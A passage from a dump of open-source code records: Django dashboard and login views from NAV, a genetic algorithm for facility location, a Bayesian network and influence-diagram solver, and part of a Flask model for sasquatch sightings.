get_object_or_404(AccountDashboard, pk=did, account=request.account)\n\n response = JsonResponse(dashboard.to_json_dict())\n response['Content-Disposition'] = 'attachment; filename={name}.json'.format(\n name=urlquote(dashboard.name)\n )\n return response\n\n\ndashboard_fields = {\n 'name': str,\n 'num_columns': int,\n 'widgets': list,\n 'version': int,\n}\n\nwidget_fields = {\n 'navlet': str,\n 'column': int,\n 'preferences': dict,\n 'order': int,\n}\n\n\n@require_POST\ndef import_dashboard(request):\n \"\"\"Receive an uploaded dashboard file and store in database\"\"\"\n if not can_modify_navlet(request.account, request):\n return HttpResponseForbidden()\n response = {}\n if 'file' in request.FILES:\n try:\n # Ensure file is interpreted as utf-8 regardless of locale\n blob = request.FILES['file'].read()\n data = json.loads(blob.decode(\"utf-8\"))\n if not isinstance(data, dict):\n raise ValueError()\n for field, dtype in dashboard_fields.items():\n if field not in data:\n raise ValueError()\n if not isinstance(data[field], dtype):\n raise ValueError()\n dashboard = AccountDashboard(account=request.account, name=data['name'])\n dashboard.num_columns = data['num_columns']\n widgets = []\n for widget in data['widgets']:\n if not isinstance(widget, dict):\n raise ValueError()\n for field, dtype in widget_fields.items():\n if field not in widget:\n raise ValueError()\n if not isinstance(widget[field], dtype):\n raise ValueError()\n if widget['column'] > dashboard.num_columns:\n raise ValueError()\n widget = {k: v for k, v in widget.items() if k in widget_fields}\n widgets.append(widget)\n dashboard.save()\n for widget in widgets:\n dashboard.widgets.create(account=request.account, **widget)\n dashboard.save()\n response['location'] = reverse('dashboard-index-id', args=(dashboard.id,))\n except ValueError:\n _logger.exception('Failed to parse dashboard file for import')\n return JsonResponse(\n {\n 'error': \"File is not a valid dashboard file\",\n },\n status=400,\n )\n else:\n return JsonResponse(\n {\n 'error': \"You need to provide a file\",\n },\n status=400,\n )\n return JsonResponse(response)\n\n\n@sensitive_post_parameters('password')\ndef login(request):\n \"\"\"Controller for the login page\"\"\"\n if request.method == 'POST':\n return do_login(request)\n\n origin = request.GET.get('origin', '').strip()\n if 'noaccess' in request.GET:\n if request.account.is_default_account():\n errors = ['You need to log in to access this resource']\n else:\n errors = [\n 'You have insufficient privileges to access this '\n 'resource. Please log in as another user.'\n ]\n else:\n errors = []\n\n return render(\n request,\n 'webfront/login.html',\n {\n 'form': LoginForm(initial={'origin': origin}),\n 'origin': origin,\n 'errors': errors,\n },\n )\n\n\n@sensitive_variables('password')\ndef do_login(request):\n \"\"\"Do a login based on post parameters\"\"\"\n errors = []\n form = LoginForm(request.POST)\n origin = request.POST.get('origin', '').strip()\n\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n\n try:\n account = auth.authenticate(username, password)\n except ldapauth.Error as error:\n errors.append('Error while talking to LDAP:\\n%s' % error)\n else:\n if account:\n LogEntry.add_log_entry(\n account, 'log-in', '{actor} logged in', before=account\n )\n\n try:\n request.session[ACCOUNT_ID_VAR] = account.id\n request.account = account\n except ldapauth.Error as error:\n errors.append('Error while talking to LDAP:\\n%s' % error)\n else:\n _logger.info(\"%s successfully logged in\", account.login)\n if not origin:\n origin = reverse('webfront-index')\n return HttpResponseRedirect(origin)\n else:\n _logger.info(\"failed login: %r\", username)\n errors.append(\n 'Username or password is incorrect, or the ' 'account is locked.'\n )\n\n # Something went wrong. Display login page with errors.\n return render(\n request,\n 'webfront/login.html',\n {\n 'form': form,\n 'errors': errors,\n 'origin': origin,\n },\n )\n\n\ndef logout(request):\n \"\"\"Controller for doing a logout\"\"\"\n nexthop = auth_logout(request)\n return HttpResponseRedirect(nexthop)\n\n\ndef about(request):\n \"\"\"Controller for the about page\"\"\"\n return render(\n request,\n 'webfront/about.html',\n {\n 'navpath': [('Home', '/'), ('About', None)],\n 'title': 'About NAV',\n },\n )\n\n\ndef toolbox(request):\n \"\"\"Render the toolbox\"\"\"\n account = request.account\n tools = sorted(tool_list(account), key=attrgetter('name'))\n\n return render(\n request,\n 'webfront/toolbox.html',\n {\n 'navpath': [('Home', '/'), ('Toolbox', None)],\n 'tools': tools,\n 'title': 'NAV toolbox',\n },\n )\n\n\ndef _create_preference_context(request):\n \"\"\"\n Creates a context used by different views for the multiform preference page\n \"\"\"\n account = get_account(request)\n\n if account.ext_sync:\n password_form = None\n else:\n password_form = ChangePasswordForm()\n\n context = {\n 'navpath': [('Home', '/'), ('Preferences', None)],\n 'title': 'Personal NAV preferences',\n 'password_form': password_form,\n 'columns_form': ColumnsForm(\n initial={'num_columns': get_widget_columns(account)}\n ),\n 'account': account,\n 'tool': {\n 'name': 'My account',\n 'description': 'Edit my personal NAV account settings',\n },\n 'navbar_formset': NavbarLinkFormSet(\n queryset=NavbarLink.objects.filter(account=account)\n ),\n }\n\n return context\n\n\ndef preferences(request):\n \"\"\"My preferences\"\"\"\n context = _create_preference_context(request)\n\n return render(request, 'webfront/preferences.html', context)\n\n\n@sensitive_post_parameters('old_password', 'new_password1', 'new_password2')\ndef change_password(request):\n \"\"\"Handles POST requests to change a users password\"\"\"\n context = _create_preference_context(request)\n account = get_account(request)\n\n if account.is_default_account():\n return render(request, 'useradmin/not-logged-in.html', {})\n\n if request.method == 'POST':\n password_form = ChangePasswordForm(request.POST, my_account=account)\n\n if password_form.is_valid():\n account.set_password(password_form.cleaned_data['new_password1'])\n account.save()\n new_message(\n request, 'Your password has been changed.', type=Messages.SUCCESS\n )\n else:\n context['password_form'] = password_form\n return render(request, 'webfront/preferences.html', context)\n\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef save_links(request):\n \"\"\"Saves navigation preference links on a user\"\"\"\n account = get_account(request)\n context = _create_preference_context(request)\n\n if request.method == 'POST':\n formset = NavbarLinkFormSet(request.POST)\n if formset.is_valid():\n instances = formset.save(commit=False)\n for instance in instances:\n instance.account = account\n instance.save()\n for form in formset.deleted_objects:\n instance = form.delete()\n new_message(request, 'Your links were updated.', type=Messages.SUCCESS)\n else:\n context['navbar_formset'] = formset\n\n return render(request, 'webfront/preferences.html', context)\n\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef set_widget_columns(request):\n \"\"\"Set the number of columns on the webfront\"\"\"\n if request.method == 'POST':\n form = ColumnsForm(request.POST)\n if form.is_valid():\n account = request.account\n num_columns = form.cleaned_data.get('num_columns')\n account.preferences[account.PREFERENCE_KEY_WIDGET_COLUMNS] = num_columns\n account.save()\n return HttpResponseRedirect(reverse('webfront-index'))\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef set_account_preference(request):\n \"\"\"Set account preference using url attributes\"\"\"\n account = request.account\n account.preferences.update(request.GET.dict())\n account.save()\n return HttpResponse()\n\n\n@require_POST\ndef set_default_dashboard(request, did):\n \"\"\"Set the default dashboard for the user\"\"\"\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n try:\n old_default = AccountDashboard.objects.get(\n account=request.account, is_default=True\n )\n except AccountDashboard.DoesNotExist:\n # No previous default\n old_default = None\n\n dash.is_default = True\n dash.save()\n if old_default:\n old_default.is_default = False\n old_default.save()\n return HttpResponse(u'Default dashboard set to «{}»'.format(dash.name))\n\n\n@require_POST\ndef add_dashboard(request):\n \"\"\"Add a new dashboard to this user\"\"\"\n name = request.POST.get('dashboard-name', 'New dashboard')\n dashboard = AccountDashboard(account=request.account, name=name)\n dashboard.save()\n return JsonResponse({'dashboard_id': dashboard.pk})\n\n\n@require_POST\ndef delete_dashboard(request, did):\n \"\"\"Delete this dashboard and all widgets on it\"\"\"\n is_last = AccountDashboard.objects.filter(account=request.account).count() == 1\n if is_last:\n return HttpResponse('Can not delete last dashboard', status=400)\n\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dash.delete()\n\n return HttpResponse('Dashboard deleted')\n\n\n@require_POST\ndef rename_dashboard(request, did):\n \"\"\"Rename this dashboard\"\"\"\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dash.name = request.POST.get('dashboard-name', dash.name)\n dash.save()\n return HttpResponse(u'Dashboard renamed to «{}»'.format(dash.name))\n\n\n@require_POST\ndef save_dashboard_columns(request, did):\n \"\"\"Save the number of columns for this dashboard\"\"\"\n\n # Explicit fetch on account to prevent other people to change settings\n dashboard = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dashboard.num_columns = request.POST.get('num_columns', 3)\n dashboard.save()\n return HttpResponse()\n\n\n@require_POST\n@require_param('widget_id')\ndef moveto_dashboard(request, did):\n \"\"\"Move a widget to this dashboard\"\"\"\n account = request.account\n dashboard = get_object_or_404(AccountDashboard, account=account, pk=did)\n widget = get_object_or_404(\n AccountNavlet, account=account, pk=request.POST.get('widget_id')\n )\n widget.dashboard = dashboard\n widget.save()\n return HttpResponse(u'Widget moved to {}'.format(dashboard))\n","repo_name":"Uninett/nav","sub_path":"python/nav/web/webfront/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14595,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"95"} +{"seq_id":"73626070393","text":"import random\r\n\r\nclass Facility:\r\n def __init__(self, id, capacity, fixed_cost, operating_cost):\r\n self.id = id\r\n self.capacity = capacity\r\n self.fixed_cost = fixed_cost\r\n self.operating_cost = operating_cost\r\n self.customers = []\r\n\r\n def add_customer(self, customer):\r\n self.customers.append(customer)\r\n\r\n def remove_customer(self, customer):\r\n self.customers.remove(customer)\r\n\r\nclass Customer:\r\n def __init__(self, id, demand):\r\n self.id = id\r\n self.demand = demand\r\n\r\nclass GeneticAlgorithm:\r\n def __init__(self, population_size, num_generations, crossover_rate, mutation_rate):\r\n self.population_size = population_size\r\n self.num_generations = num_generations\r\n self.crossover_rate = crossover_rate\r\n self.mutation_rate = mutation_rate\r\n self.population = []\r\n\r\n def initialize_population(self, facilities, customers):\r\n for _ in range(self.population_size):\r\n chromosome = []\r\n for customer in customers:\r\n facility = random.choice(facilities)\r\n chromosome.append((customer.id, facility.id))\r\n self.population.append(chromosome)\r\n\r\n def evaluate_fitness(self, chromosome):\r\n total_cost = 0\r\n for customer_id, facility_id in chromosome:\r\n facility = facilities[facility_id]\r\n customer = customers[customer_id]\r\n total_cost += facility.fixed_cost + facility.operating_cost * customer.demand\r\n return -total_cost # Minimize cost, so negate the value\r\n\r\n def select_parents(self):\r\n # Tournament selection\r\n tournament_size = 2\r\n parents = []\r\n for _ in range(2):\r\n tournament = random.sample(self.population, tournament_size)\r\n parent = max(tournament, key=lambda x: self.evaluate_fitness(x))\r\n parents.append(parent)\r\n return parents\r\n\r\n def crossover(self, parent1, parent2):\r\n if random.random() < self.crossover_rate:\r\n crossover_point = random.randint(1, len(parent1) - 1)\r\n child1 = parent1[:crossover_point] + parent2[crossover_point:]\r\n child2 = parent2[:crossover_point] + parent1[crossover_point:]\r\n return child1, child2\r\n else:\r\n return parent1, parent2\r\n\r\n def mutate(self, chromosome):\r\n mutated_chromosome = []\r\n for gene in chromosome:\r\n if random.random() < self.mutation_rate:\r\n customer_id, _ = gene\r\n facility_id = random.randint(0, len(facilities) - 1)\r\n mutated_gene = (customer_id, facility_id)\r\n mutated_chromosome.append(mutated_gene)\r\n else:\r\n mutated_chromosome.append(gene)\r\n return mutated_chromosome\r\n\r\n def evolve(self):\r\n for _ in range(self.num_generations):\r\n new_population = []\r\n\r\n while len(new_population) < self.population_size:\r\n parent1, parent2 = self.select_parents()\r\n child1, child2 = self.crossover(parent1, parent2)\r\n mutated_child1 = self.mutate(child1)\r\n mutated_child2 = self.mutate(child2)\r\n new_population.extend([mutated_child1, mutated_child2])\r\n\r\n self.population = new_population\r\n\r\n best_chromosome = max(self.population, key=lambda x: self.evaluate_fitness(x))\r\n best_fitness = self.evaluate_fitness(best_chromosome)\r\n return best_chromosome, -best_fitness # Return the positive fitness value\r\n\r\n# Example usage\r\nfacilities = [\r\n Facility(id=0, capacity=100, fixed_cost=10, operating_cost=1),\r\n Facility(id=1, capacity=200, fixed_cost=20, operating_cost=2),\r\n Facility(id=2, capacity=150, fixed_cost=15, operating_cost=1.5)\r\n]\r\n\r\ncustomers = [\r\n Customer(id=0, demand=50),\r\n Customer(id=1, demand=80),\r\n Customer(id=2, demand=120)\r\n]\r\n\r\nga = GeneticAlgorithm(population_size=10, num_generations=100, crossover_rate=0.8, mutation_rate=0.2)\r\nga.initialize_population(facilities, customers)\r\nbest_chromosome, best_fitness = ga.evolve()\r\n\r\nprint(\"Best Solution:\", best_chromosome)\r\nprint(\"Best Cost:\", best_fitness)\r\n","repo_name":"amirata051/Linear-programming","sub_path":"Q2_Genetic.py","file_name":"Q2_Genetic.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"6480710148","text":"import re\nimport sys\nfrom copy import deepcopy\nfrom decimal import Decimal\nfrom itertools import product\n\nimport itertools\n\n# ______________________________________________________________________________\n\nlistOfQueries = []\nT, F = True, False\nkeyPrintValue =[]\n\n\n# ______________________________________________________________________________\n\nclass ProbDist:\n def __init__(self, varname='?', freqs=None):\n\n self.prob = {}\n self.varname = varname\n self.values = []\n\n if freqs:\n for (v, p) in list(freqs.items()):\n self[v] = p\n self.normalize()\n\n def __getitem__(self, val):\n\n try:\n return self.prob[val]\n except KeyError:\n return 0\n\n def __setitem__(self, val, p):\n\n if val not in self.values:\n self.values.append(val)\n self.prob[val] = p\n\n def normalize(self):\n\n total = sum(self.prob.values())\n if not isclose(total, 1.0):\n for val in self.prob:\n self.prob[val] /= total\n\n return self\n\n def show_approx(self, numfmt='%.3g'):\n\n return ', '.join([('%s: ' + numfmt) % (v, p)\n for (v, p) in sorted(self.prob.items())])\n\n# ______________________________________________________________________________\n\ndef event_values(event, variables):\n\n #print variables\n if isinstance(event, tuple) and len(event) == len(variables):\n #print event\n return event\n else:\n #print tuple([event[var] for var in variables])\n return tuple([event[var] for var in variables])\n\ndef isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n\n return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n# ______________________________________________________________________________\n\nclass BayesNet:\n\n\n\n def __init__(self, node_specs=[]):\n\n self.nodes = []\n self.variables = []\n for node_spec in node_specs:\n self.add(node_spec)\n\n def add(self, node_spec):\n\n node = BayesNode(*node_spec)\n assert node.variable not in self.variables\n assert every(lambda parent: parent in self.variables, node.parents)\n self.nodes.append(node)\n self.variables.append(node.variable)\n for parent in node.parents:\n self.variable_node(parent).children.append(node)\n\n def variable_node(self, var):\n\n for n in self.nodes:\n if n.variable == var:\n return n\n raise Exception(\"No such variable: %s\" % var)\n\n def variable_values(self, var):\n\n return [True,False]\n\n def __repr__(self):\n return 'BayesNet(%r)' % self.nodes\n def getValues(self):\n return self\n\n# ______________________________________________________________________________\n\ndef every(predicate, seq): # TODO: replace with all\n \"\"\"True if every element of seq satisfies predicate.\"\"\"\n\n return all(predicate(x) for x in seq)\n\ndef doRound(a):\n val = Decimal(str(a)).quantize(Decimal('.01'))\n return val\n\nclass BayesNode:\n\n\n\n def __init__(self, X, parents, cpt):\n\n if isinstance(parents, str):\n parents = parents.split()\n\n # We store the table always in the third form above.\n if isinstance(cpt, (float, int)): # no parents, 0-tuple\n cpt = {(): cpt}\n elif isinstance(cpt, dict):\n # one parent, 1-tuple\n if cpt and isinstance(list(cpt.keys())[0], bool):\n cpt = dict(((v,), p) for v, p in list(cpt.items()))\n\n assert isinstance(cpt, dict)\n for vs, p in list(cpt.items()):\n assert isinstance(vs, tuple) and len(vs) == len(parents)\n assert every(lambda v: isinstance(v, bool), vs)\n #assert 0 <= p <= 1\n\n self.variable = X\n self.parents = parents\n self.cpt = cpt\n self.children = []\n\n def p(self, value, event):\n\n assert isinstance(value, bool)\n t= event_values(event, self.parents)\n ptrue = self.cpt[event_values(event, self.parents)]\n if(ptrue !=1):\n return (ptrue if value else 1 - ptrue)\n else:\n return (ptrue if value else ptrue)\n\n\n def __repr__(self):\n\n return repr((self.variable, ' '.join(self.parents)))\n\n# ______________________________________________________________________________\n\ndef calculateJointProbablity(X, e, bn):\n\n assert X not in e, \"Query variable must be distinct from evidence\"\n Q = ProbDist(X)\n for xi in bn.variable_values(X):\n Q[xi] = enumerate_all(bn.variables, extend(e, X, xi), bn)\n\n return Q.prob\n\ndef enumeration_ask(X, e, bn):\n\n assert X not in e, \"Query variable must be distinct from evidence\"\n listOfVarC = X.split(', ')\n lenOfVar = len(listOfVarC)\n Q = ProbDist(X)\n for xi in itertools.product(bn.variable_values(X), repeat = lenOfVar):\n Q[xi] = enumerate_all(bn.variables, extend(e, X, xi), bn)\n return Q.normalize()\n\ndef extend(s, var, val):\n\n s2 = s.copy()\n t1 = var.split(', ')\n if(isinstance(val, tuple)):\n for k in range(0, len(val)):\n s2[t1[k]] = val[k]\n else:\n s2[var] = val\n return s2\n\n\ndef enumerate_all(variables, e, bn):\n\n if not variables:\n return 1.0\n Y, rest = variables[0], variables[1:]\n Ynode = bn.variable_node(Y)\n if Y in e:\n return Ynode.p(e[Y], e) * enumerate_all(rest, e, bn)\n else:\n return sum(Ynode.p(y, e) * enumerate_all(rest, extend(e, Y, y), bn)\n for y in bn.variable_values(Y))\n# ______________________________________________________________________________\ndef parserInputFile():\n listOfNode = []\n listOfParents =[]\n bayesNetObject =[]\n\n storeLine =()\n mainNode ={}\n with open(sys.argv[2], \"r\") as infile:\n #To Get all the Queries in the List\n for line in infile:\n parseLine = line.strip()\n if(parseLine == \"******\"):\n break\n else:\n listOfQueries.append(parseLine)\n #print listOfQueries\n storeTheRelationship =[]\n parentNodes =[]\n for line in infile:\n parseLine = line.strip()\n #print parseLine\n if(parseLine == \"***\" or parseLine == \"******\"):\n if(len(mainNode) != 0):\n storeLine = storeLine + (mainNode,)\n bayesNetObject.append(storeLine)\n #empty all the object\n currentNode=[]\n parentNode=[]\n storeLine=()\n mainNode={}\n\n else:\n\n startString = parseLine.split(' ')[0]\n t = re.match(\"^[A-Za-z]\", startString)\n if(t != None):\n\n if(t.string == \"decision\"):\n storeLine = storeLine + (1,)\n elif(re.match(\"^[A-Za-z]\",startString ) ):\n\n storeTheRelationship =parseLine.split('|')\n currentNode = storeTheRelationship[0].strip()\n storeLine = storeLine + (currentNode,)\n parentNodes = storeTheRelationship[1:len(storeTheRelationship)]\n if (len(parentNodes) == 0):\n storeLine = storeLine +('',)\n else:\n allParentNode = ' '.join(parentNodes).strip()\n storeLine = storeLine + (allParentNode,)\n else:\n #print \"Its a number\"\n numberNode = parseLine.split(' ')\n probvalue = float(numberNode[0])\n truthTable = numberNode[1: len(numberNode)]\n\n if (len(truthTable) == 0):\n storeLine = storeLine + (probvalue,)\n\n elif (len(truthTable) == 1):\n\n if (truthTable[0] == '+'):\n mainNode[T] = probvalue\n else:\n mainNode[F] = probvalue\n #storeLine = storeLine + (mainNode,)\n\n elif (len(truthTable) == 2):\n tempTuple =()\n if(truthTable[0] == \"+\" and truthTable[1] == \"+\"):\n tempTuple = (T, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\"):\n tempTuple = (T, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\"):\n tempTuple = (F, T)\n else:\n tempTuple = (F, F)\n mainNode[tempTuple] = probvalue\n\n else :\n tempTuple = ()\n if (truthTable[0] == \"+\" and truthTable[1] == \"+\" and truthTable[2] == \"+\"):\n tempTuple = (T, T, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"+\" and truthTable[2] == \"-\"):\n tempTuple = (T, T, F)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\" and truthTable[2] == \"+\"):\n tempTuple = (T, F, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\" and truthTable[2] == \"-\"):\n tempTuple = (T, F, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\" and truthTable[2] == \"+\"):\n tempTuple = (F, T, T)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\" and truthTable[2] == \"-\"):\n tempTuple = (F, T, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"-\" and truthTable[2] == \"+\"):\n tempTuple = (F, F, T)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"-\" and truthTable[2] == \"-\"):\n tempTuple = (F, F, F)\n\n mainNode[tempTuple] = probvalue\n\n #storeLine = storeLine + (mainNode,)\n storeLine = storeLine + (mainNode,)\n bayesNetObject.append(storeLine)\n #print \"***********\"\n #print bayesNetObject\n return bayesNetObject\n\ndef calculateProbablity(i,Prg):\n\n if ('|' in i):\n varDict = {}\n qItem =[]\n nameOfVariable =[]\n queryVar = i[i.index(\"(\") + 1:i.index(\" | \")].split(', ')\n evidenceVar = i[i.index(\"|\") + 1:i.index(\")\")].split(', ')\n argsList =[]\n varDict = getEvidenceDictionary(evidenceVar)\n for k in queryVar:\n if('=' in k):\n qItem = k.split(' = ')\n if (qItem[1].strip() == \"+\"):\n keyPrintValue.append(T)\n nameOfVariable.append(qItem[0])\n else:\n keyPrintValue.append(F)\n nameOfVariable.append(qItem[0])\n else:\n keyPrintValue.append(T)\n nameOfVariable.append(k)\n #qItem.append(k)\n argString = ', '.join(nameOfVariable)\n\n\n value = enumeration_ask(argString, varDict, Prg)\n return value.prob\n\n else:\n\n listVariable = i[i.index(\"(\") + 1:i.index(\")\")].split(',')\n varDict = getEvidenceDictionary(listVariable)\n value = calculateJointProbablity('', varDict, Prg)\n keyPrintValue.append(T)\n return value\n\n\n\ndef calculateParents(utility, Prg):\n parentList = Prg.variable_node(utility)\n return parentList.parents\n\ndef calculateUtility(utility, Prg):\n parentList = Prg.variable_node(utility)\n return parentList.cpt\n\n\ndef getEvidenceDictionary(listVariable):\n varDict = {}\n for j in listVariable:\n gItem = j.split(' = ')\n if (gItem[1].strip() == \"+\"):\n varDict[gItem[0].strip()] = T\n else:\n varDict[gItem[0].strip()] = F\n\n return varDict\n\n\ndef calculateExpectedUtility(Prg,i):\n deleteDict ={}\n vTemp = calculateUtility(\"utility\", Prg)\n\n listOfParents = calculateParents(\"utility\", Prg)\n listOfEve = i[i.index(\"(\") + 1:i.index(\")\")]\n if ('|' in listOfEve):\n temp = listOfEve.split('|')\n listOfEve = ', '.join(temp)\n kTemp = listOfEve.split(', ')\n temp = getEvidenceDictionary(kTemp)\n kItems = temp.keys()\n listCopy = deepcopy(listOfParents)\n\n for x in listCopy:\n if (x in temp ):\n deleteDict[x] = listCopy.index(x)\n listCopy.remove(x)\n\n\n\n #print deleteDict\n\n if (len(listOfParents) == 1):\n X = ', '.join(listOfParents)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value =0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n\n\n\n elif (len(listOfParents) == 2):\n\n if(len(listCopy) == 2):\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value = 0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n else:\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n #print probsDict\n kList =[None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n #print kList\n for k in range(0,1):\n if(kList[k] == None):\n kList[k] = T\n v1 = tuple(kList,)\n kList[k] = F\n v2 = tuple(kList,)\n value = probsDict[(T,)]*vTemp[v1] + probsDict[(F,)]*vTemp[v2]\n\n\n elif (len(listCopy) == 3):\n\n if (len(listCopy) == 3):\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value = 0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n\n elif(len(listCopy) == 2):\n\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n # print probsDict\n kList = [None, None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n posList =[]\n for t in kList:\n if(t == None):\n posList.append(kList.index(t))\n for xi in itertools.product([T,F], repeat = 2):\n kList[posList[0]] = xi[0]\n kList[posList[1]] = xi[1]\n t = tuple(kList)\n value = value + probsDict[xi] * vTemp[t]\n\n else:\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n # print probsDict\n kList = [None, None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n # print kList\n for k in range(0, 2):\n if (kList[k] == None):\n kList[k] = T\n v1 = tuple(kList, )\n kList[k] = F\n v2 = tuple(kList, )\n value = probsDict[(T,)] * vTemp[v1] + probsDict[(F,)] * vTemp[v2]\n\n\n\n return value\n\n\n\n\n\ndef maximumExpectedUtility(Prg, ii):\n #print \"Inside MaximumUtilty\"\n tempQuery = ii[ii.index(\"(\") + 1:ii.index(\")\")]\n tempString = tempQuery.replace(', ', ' | ')\n tempList = tempString.split(' | ')\n # print tempList\n varValue = {}\n for i in range(0, len(tempList)):\n tempValue = tempList[i].split(\" = \")\n if len(tempValue) == 2:\n tempList[i] = tempValue[0]\n varValue[i] = tempValue[1]\n # print varValue\n # print tempList\n length = len(tempList)\n varList = ['+', '-']\n max = 0\n value = 0\n tup = ()\n flag = 0\n #query = Query()\n for xi in itertools.product(varList, repeat=length):\n argumentList = []\n for i in range(0, length):\n if varValue.has_key(i):\n if xi[i] == varValue.get(i):\n flag = 0\n else:\n flag = 1\n argumentList.append(tempList[i] + \" = \" + xi[i])\n tempString = \", \".join(argumentList)\n tempString = \"EU(\" + tempString +\")\"\n #query.value = tempString\n if flag == 1:\n flag = 0\n else:\n value = calculateExpectedUtility(Prg, tempString)\n if value > max:\n max = value\n tup = xi\n tempString = \"\"\n for i in range(0, len(tup)):\n if varValue.has_key(i):\n flag = 1\n else:\n tempString += tup[i] + \" \"\n tempString += str(int(max + 0.5))\n return tempString\n\n\ndef writeFile(a,f1):\n str5 = str(a) + \"\\n\"\n f1.write(str5)\n\n\ndef parseQuery(listOfQueries):\n bayesianNetwork = parserInputFile()\n f1 = open(\"output.txt\", 'w')\n\n #print bayesianNetwork\n Prg = BayesNet(bayesianNetwork)\n for i in listOfQueries:\n firstChar = i[:1]\n if(firstChar== \"P\"):\n valueReturn = calculateProbablity(i,Prg)\n x = keyPrintValue[0]\n checkType = valueReturn.keys()\n\n if (isinstance(checkType[0], tuple)):\n if(len(checkType[0]) == 1):\n writeFile(doRound(valueReturn.get((x,))),f1)\n elif(len(checkType[0]) == 2):\n tup = ()\n #print nameOfVariable\n #print keyPrintValue\n for i in keyPrintValue:\n if(i == T):\n tup += (T,)\n else:\n tup+= (F,)\n writeFile(doRound(valueReturn.get(tup)),f1)\n else:\n tup = ()\n #When there are three variable in left of conditional probablity\n for i in keyPrintValue:\n if (i == T):\n tup += (T,)\n else:\n tup += (F,)\n writeFile(doRound(valueReturn.get(tup)),f1)\n\n #Is instance of String: When there is no Conditional Probablity\n else:\n writeFile(doRound(valueReturn[x]),f1)\n\n del keyPrintValue[:]\n\n elif(firstChar == \"E\"):\n finalEUValue = calculateExpectedUtility(Prg,i)\n writeFile(int(finalEUValue+0.5),f1)\n\n elif(firstChar == \"M\"):\n finalMEUValue = maximumExpectedUtility(Prg,i)\n writeFile(finalMEUValue,f1)\n #return 0\n\n#Main Program Starts Here\n\nparseQuery(listOfQueries)\n\n","repo_name":"vivektiwari7114/InfluenceDiagram","sub_path":"BayesianNetworks.py","file_name":"BayesianNetworks.py","file_ext":"py","file_size_in_byte":19230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"189908558","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models.user import User\n\nclass Sasq:\n db_name = 'sasquatch'\n\n def __init__(self,db_data):\n print(db_data)\n self.id = db_data['id']\n self.location = db_data['location']\n self.description = db_data['description']\n self.num_of_sasq = db_data['num_of_sasq']\n self.date_siting = db_data['date_siting']\n self.user_id = db_data['user_id']\n user = User.get_by_id({'id': db_data['user_id']})\n self.name = user.first_name +\" \"+ user.last_name\n self.created_at = db_data['created_at']\n self.updated_at = db_data['updated_at']\n\n @classmethod\n def save(cls,data):\n query = \"INSERT INTO sasq (location, description, num_of_sasq, date_siting, user_id) VALUES (%(location)s,%(description)s,%(num_of_sasq)s,%(date_siting)s,%(user_id)s);\"\n return connectToMySQL(cls.db_name).query_db(query, data)\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM sasq;\"\n results = connectToMySQL(cls.db_name).query_db(query)\n all_sasq = []\n for row in results:\n print(row['date_siting'])\n all_sasq.append( cls(row) )\n return all_sasq\n \n @classmethod\n def get_one(cls,data):\n query = \"SELECT * FROM sasq WHERE id = %(id)s;\"\n results = connectToMySQL(cls.db_name).query_db(query,data)\n return cls( results[0] )\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE sasq SET location=%(location)s, description=%(description)s, num_of_sasq=%(num_of_sasq)s, date_siting=%(date_siting)s,updated_at=NOW() WHERE id = %(id)s;\"\n return connectToMySQL(cls.db_name).query_db(query,data)\n \n @classmethod\n def destroy(cls,data):\n query = \"DELETE FROM sasq WHERE id = %(id)s;\"\n return connectToMySQL(cls.db_name).query_db(query,data)\n\n @staticmethod\n def validate_sasq(sasq):\n is_valid = True\n if len(sasq['location']) < 3:\n is_valid = False\n flash(\"Location must be filled in\",\"sasq\")\n if int(sasq['num_of_sasq']) < 1:\n is_valid = False\n flash(\"Number of Sasquatches must be at least 1\",\"sasq\")\n if len(sasq['description']) < 5:\n is_valid = False\n flash(\"Description must be filled in\",\"sasq\")\n if sasq['date_siting'] == \"\":\n is_valid = False\n 